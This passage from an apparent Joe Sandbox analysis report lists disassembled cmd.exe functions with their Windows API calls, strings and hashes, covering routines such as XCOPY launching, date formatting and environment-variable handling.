                                                                                                                                            • API String ID: 1351325837-2236139042
                                                                                                                                            • Opcode ID: 2f935beff5fe7bb022ac4ff25a7d3e581e8840c9f7a33c5823d160bf5919e031
                                                                                                                                            • Instruction ID: c9f335672356bd58fc1cf99f5374fa30c1fcff6c0c15c0de5b2b3dc5ad639d64
                                                                                                                                            • Opcode Fuzzy Hash: 2f935beff5fe7bb022ac4ff25a7d3e581e8840c9f7a33c5823d160bf5919e031
                                                                                                                                            • Instruction Fuzzy Hash: 27C12575730213A6DB358F399D1877B27ACAF50751F64412AEC4AEA284EFB0C929C364
                                                                                                                                            Function 00249458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0026C9D0,00000108,00252107,?,00000000,00000000,00000000), ref: 002494AA
                                                                                                                                            • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 002494D9
                                                                                                                                            • memset.MSVCRT ref: 002494F1
                                                                                                                                            • memset.MSVCRT ref: 0024954A
                                                                                                                                            • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0024955D
                                                                                                                                              • Part of subcall function 00251D90: _wcsnicmp.MSVCRT ref: 00251E14
                                                                                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 002495B8
                                                                                                                                            • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00249602
                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00249624
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0025BDF1
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0025BE0D
                                                                                                                                            • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0025BE26
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                            • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                            • API String ID: 1449572041-3461277227
                                                                                                                                            • Opcode ID: c3bf77921f9dba55a548bac8e105c924c7ab3d56929116fd5143514378c1a2b7
                                                                                                                                            • Instruction ID: d748aef526de5b3f3be81b5a5e997d82527a1a7e9e49892676a2cdf82477f4b5
                                                                                                                                            • Opcode Fuzzy Hash: c3bf77921f9dba55a548bac8e105c924c7ab3d56929116fd5143514378c1a2b7
                                                                                                                                            • Instruction Fuzzy Hash: 98C1B374A203159FDB28DF64DC49BAA77B8EB45304F1440AAFA0AD7240EB708DE4CF56
                                                                                                                                            Function 00244C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                            • API String ID: 0-1980097535
                                                                                                                                            • Opcode ID: 7de1c1da274fc61116a51b1acdb06d5a1044b55e165525b2ddb4f6393c450744
                                                                                                                                            • Instruction ID: 090d52fd49bd3f38343154bb1505f1e52a6c46525b93b59f0bc38198b1903fd7
                                                                                                                                            • Opcode Fuzzy Hash: 7de1c1da274fc61116a51b1acdb06d5a1044b55e165525b2ddb4f6393c450744
                                                                                                                                            • Instruction Fuzzy Hash: 2312E7702283429BD728DF24C889B6F77E9EF88345F00491DF989D7290EB74D869CB56
                                                                                                                                            Function 00246854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0026E590,?,00002000), ref: 00246896
                                                                                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002468AA
                                                                                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 002468BE
                                                                                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002468D2
                                                                                                                                            • realloc.MSVCRT ref: 0025A5E7
                                                                                                                                              • Part of subcall function 00248791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00246906,0000001F,?,00000080), ref: 00248791
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00246907
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0024698F
                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 00246A86
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00246AAF
                                                                                                                                            • realloc.MSVCRT ref: 00246ACA
                                                                                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00246AFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                                                                            • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                                                                            • API String ID: 2927284792-4023967598
                                                                                                                                            • Opcode ID: 2e0440ee0a2ac0fd20ecd921a441c96cad1d0c5f5f4a06507d0a0103806ae58f
                                                                                                                                            • Instruction ID: 92921a3e8817393e93947786dbd47a40ffb8f9e1bee580db1dd75c073188e0b2
                                                                                                                                            • Opcode Fuzzy Hash: 2e0440ee0a2ac0fd20ecd921a441c96cad1d0c5f5f4a06507d0a0103806ae58f
                                                                                                                                            • Instruction Fuzzy Hash: 42C12872A202259BDF28DF50DC4DAEF77B8EB48301F5441AAE90AE7140EA719E94CF51
                                                                                                                                            Function 0025589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,002559D0,?,00246054,-00001038,00000000,?,?), ref: 002558BB
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 002558CD
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00255944
                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025594B
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025596C
                                                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00255973
                                                                                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0025598F
                                                                                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 002559B6
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0026160B
                                                                                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,002559D0,?,00246054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00261618
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3609286125-0
                                                                                                                                            • Opcode ID: 358249d5446318b91f42f8e88c39d1755e1adc06adb816bcb09ac855fbb4c8d0
                                                                                                                                            • Instruction ID: 8c42b77b97086eef7507e12298e4d174c2e374b0a05e47c651e2b535483187cc
                                                                                                                                            • Opcode Fuzzy Hash: 358249d5446318b91f42f8e88c39d1755e1adc06adb816bcb09ac855fbb4c8d0
                                                                                                                                            • Instruction Fuzzy Hash: 39311734212601DFEB148F24FC2CB697BB5FB44336F244119E85A832E0DB359895DF55
                                                                                                                                            Function 00267460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00267483
                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00267495
                                                                                                                                            • fprintf.MSVCRT ref: 002674BB
                                                                                                                                            • fflush.MSVCRT ref: 002674C9
                                                                                                                                            • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 002674E2
                                                                                                                                            • NtCancelSynchronousIoFile.NTDLL ref: 002674F8
                                                                                                                                            • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 002674FF
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 0026751C
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00267524
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3139166086-0
                                                                                                                                            • Opcode ID: 280ff0029dbc1e2fc99fc25b986dd70735106d63d2a3866440f58811ffd4a7bb
                                                                                                                                            • Instruction ID: b723cdda1e53f085b19c5152330f162f5182f530cd86160c6f5a2aecad233d65
                                                                                                                                            • Opcode Fuzzy Hash: 280ff0029dbc1e2fc99fc25b986dd70735106d63d2a3866440f58811ffd4a7bb
                                                                                                                                            • Instruction Fuzzy Hash: 2A11B635129200AFEB256F60FC4EB693B38EB0475AF54001AFD06D50A1DF7589E5CF56
                                                                                                                                            Function 00254875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00251D90: _wcsnicmp.MSVCRT ref: 00251E14
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
                                                                                                                                              • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
                                                                                                                                              • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
                                                                                                                                              • Part of subcall function 00254BAF: _wcsnicmp.MSVCRT ref: 00254C1A
                                                                                                                                              • Part of subcall function 00254BAF: _wcsnicmp.MSVCRT ref: 00260B39
                                                                                                                                            • memset.MSVCRT ref: 00254975
                                                                                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00254ABC
                                                                                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00254AF4
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00254AFF
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00254B28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                            • String ID: COPYCMD
                                                                                                                                            • API String ID: 1068965577-3727491224
                                                                                                                                            • Opcode ID: c1db03bd38b48ca564e3a479bd6ad3f64c46a91d4a2b2b5f148652dc3f423579
                                                                                                                                            • Instruction ID: 511e162cfc20888173380cfb86b4ce30c69bbbded50e0897772403ac683b083f
                                                                                                                                            • Opcode Fuzzy Hash: c1db03bd38b48ca564e3a479bd6ad3f64c46a91d4a2b2b5f148652dc3f423579
                                                                                                                                            • Instruction Fuzzy Hash: 02D10635A202168BCB28EF68DC95ABBB3B1EF58304F544569DD0AD7281EB30EDD5CB44
                                                                                                                                            Function 00244D08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,00244DCB), ref: 00244D0E
                                                                                                                                              • Part of subcall function 00244D42: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00244D66
                                                                                                                                              • Part of subcall function 00244D42: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00244D8A
                                                                                                                                              • Part of subcall function 00244D42: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00244D95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValueVersion
                                                                                                                                            • String ID: %d.%d.%05d.%d
                                                                                                                                            • API String ID: 2996790148-3457777122
                                                                                                                                            • Opcode ID: 72604b3772c944ec9f590e16ab02bbc38323f83b6170a31ce497f9241b092820
                                                                                                                                            • Instruction ID: 8df653c5ccf4ff90863a52dff2127d50fb9601a257619f9b47a0603b7dd35f38
                                                                                                                                            • Opcode Fuzzy Hash: 72604b3772c944ec9f590e16ab02bbc38323f83b6170a31ce497f9241b092820
                                                                                                                                            • Instruction Fuzzy Hash: E3D02BB1B9022037D21C35251C5AE7B108CC6C8212784012BB901972C2D8A9AC3443B4
                                                                                                                                            Function 00256800 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00256826
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 0025682D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: 35b740d6c9f0b9b848f4b794e3f7b3648be5de0bdd2b6cac77bd6c201776d26e
                                                                                                                                            • Instruction ID: c0482deb6ee843e738c165a4ea8c8e8f85339d96cfae7605542b8a87bdb37165
                                                                                                                                            • Opcode Fuzzy Hash: 35b740d6c9f0b9b848f4b794e3f7b3648be5de0bdd2b6cac77bd6c201776d26e
                                                                                                                                            • Instruction Fuzzy Hash: F7E06577621111A7CB206FCDA84C55AF7ADEB95726BA90029EA85B3200CA71AC1887D4
                                                                                                                                            Function 0024E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$iswspace
                                                                                                                                            • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                            • API String ID: 759518647-875390083
                                                                                                                                            • Opcode ID: d58dff7357aba7cfe9ce3bc134c1950569c7e07fcdcaa642dd2952a24b6d801b
                                                                                                                                            • Instruction ID: 4a54615b25ec5b04bc854544f939146ebc3e6d0f45a29ef90f8808a7ad58c603
                                                                                                                                            • Opcode Fuzzy Hash: d58dff7357aba7cfe9ce3bc134c1950569c7e07fcdcaa642dd2952a24b6d801b
                                                                                                                                            • Instruction Fuzzy Hash: 7AA10735272203C6EB3C7F25BC5E73A2364AB41706F14442AF9464A5D1EEF488B9CB1A
                                                                                                                                            Function 0024EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0026E590,00002000,?,00288BF0,00000000,?,?,00248F0D), ref: 0024EC51
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024EC77
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024EC8D
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECA3
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECB9
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECCF
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECE5
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ECF7
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0024ED0D
                                                                                                                                              • Part of subcall function 00249310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0026E590,?,00002000), ref: 00249342
                                                                                                                                              • Part of subcall function 00249310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00249356
                                                                                                                                              • Part of subcall function 00249310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0024936A
                                                                                                                                              • Part of subcall function 00249310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0024937E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                            • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                            • API String ID: 2447294730-2301591722
                                                                                                                                            • Opcode ID: 33d9f6310ad0fc1cb61bfde4a9424089d3259496be322e16f109a845ee00e62e
                                                                                                                                            • Instruction ID: 7d00b9272f99a20fcc5281a66fa5d105a28d2257dd349f767cf32b2f19d2de2f
                                                                                                                                            • Opcode Fuzzy Hash: 33d9f6310ad0fc1cb61bfde4a9424089d3259496be322e16f109a845ee00e62e
                                                                                                                                            • Instruction Fuzzy Hash: EF31FA3663A302EBBF1C5B21BC4EA6B275DFF46721B15441BF506D00C1EFA89430876A
                                                                                                                                            Function 00269C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _wcsupr.MSVCRT ref: 00269CC8
                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00269D22
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00269D2A
                                                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D3A
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D50
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00269D58
                                                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D68
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00269D7C
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00269DDB
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00269DE2
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00269DF2
                                                                                                                                            • towupper.MSVCRT ref: 00269E13
                                                                                                                                              • Part of subcall function 0024A16C: _close.MSVCRT ref: 0024A19B
                                                                                                                                            • wcschr.MSVCRT ref: 00269E6A
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00269E9B
                                                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00269EA9
                                                                                                                                              • Part of subcall function 0024DD98: _get_osfhandle.MSVCRT ref: 0024DDA3
                                                                                                                                              • Part of subcall function 0024DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0025C050), ref: 0024DDAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                            • String ID: <noalias>$CMD.EXE
                                                                                                                                            • API String ID: 2015057810-1690691951
                                                                                                                                            • Opcode ID: 2d5b2d5c8320a7f5f8aca1c108915df0811027c2385665ff1d01416f6b39f1a4
                                                                                                                                            • Instruction ID: 324a8c60dba8a3ff2d959ba084b917f63719a708f4c58f1dc8ccd58fef868507
                                                                                                                                            • Opcode Fuzzy Hash: 2d5b2d5c8320a7f5f8aca1c108915df0811027c2385665ff1d01416f6b39f1a4
                                                                                                                                            • Instruction Fuzzy Hash: 1E810676A212159BDF18AFB4EC486EEBBBDAF49710F14012AF801E7190DF7198D1CB61
                                                                                                                                            Function 0024790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00249A11: _get_osfhandle.MSVCRT ref: 00249A1C
